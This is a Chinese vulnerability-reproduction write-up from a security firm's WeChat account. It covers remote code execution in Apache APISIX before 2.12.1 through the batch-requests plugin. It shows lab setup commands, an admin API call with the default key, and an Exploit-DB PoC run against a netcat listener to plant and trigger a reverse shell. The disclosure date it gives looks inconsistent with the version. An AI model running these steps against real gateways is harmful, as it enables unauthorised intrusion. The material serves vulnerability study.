Apache APISIX是一个动态、实时、高性能的 API 网关。它提供流量管理功能,例如负载均衡、动态上行、身份验证、金丝雀发布等。
2021 年 6 月 16 日,Apache在 2.12.1 之前的 Apache APISIX 版本中正式发布了远程代码执行漏洞。攻击者可以滥用 APISIX 中的批处理请求插件来发送请求以绕过 IP 限制,从而绕过白名单和黑名单。如果它使用默认配置,则可以通过启用远程代码执行的批处理请求插件调用 Admin API。
git clone https://github.com/apache/apisix-docker.git
docker-compose -p docker-apisix up -d
curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1'
https://www.exploit-db.com/exploits/50829
接下来需要创建一个NC监听,并运行脚本进行攻击
python3 poc.py http://127.0.0.1:9080/ 172.18.0.1 9999
在这里我们可以看到我们的反向 shell 被种植在filter_func. 另外需要注意的是uri字段。其设置为/rms/fzxewh。这是在我们的json_data
在第二个请求中,向那个端点发出一个请求,触发我们的反向 shell。
锋刃科技(江苏锋刃和安徽锋刃合称锋刃科技),科技型中小企业,国家级高新技术企业。专注于互联网、移动互联网安全领域的技术研究、产品研发、大数据分析与定制服务。拥有丰富的实战经验和创新能力。目前分为运营部、研发部、技术支持部。可为客户制定一体化的应用解决方案。目前已拥有系列自有品牌的网络安全产品。
锋刃科技全体人员遵循技术创新,保持原则的工作理念,不断跟进最新技术动态,追求卓越。力争为客户提供更优质的网络安全解决方案和技术服务。同时在网络安全知识技能培训方面打造公司的特色优势。我们坚持长期主义,精进打磨、创造价值、做一家与时俱进的未来企业。
联系我们:http://www.fengrentech.com/
原文始发于微信公众号(锋刃科技):【漏洞复现】Apache APISIX < 2.12.1 远程代码执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论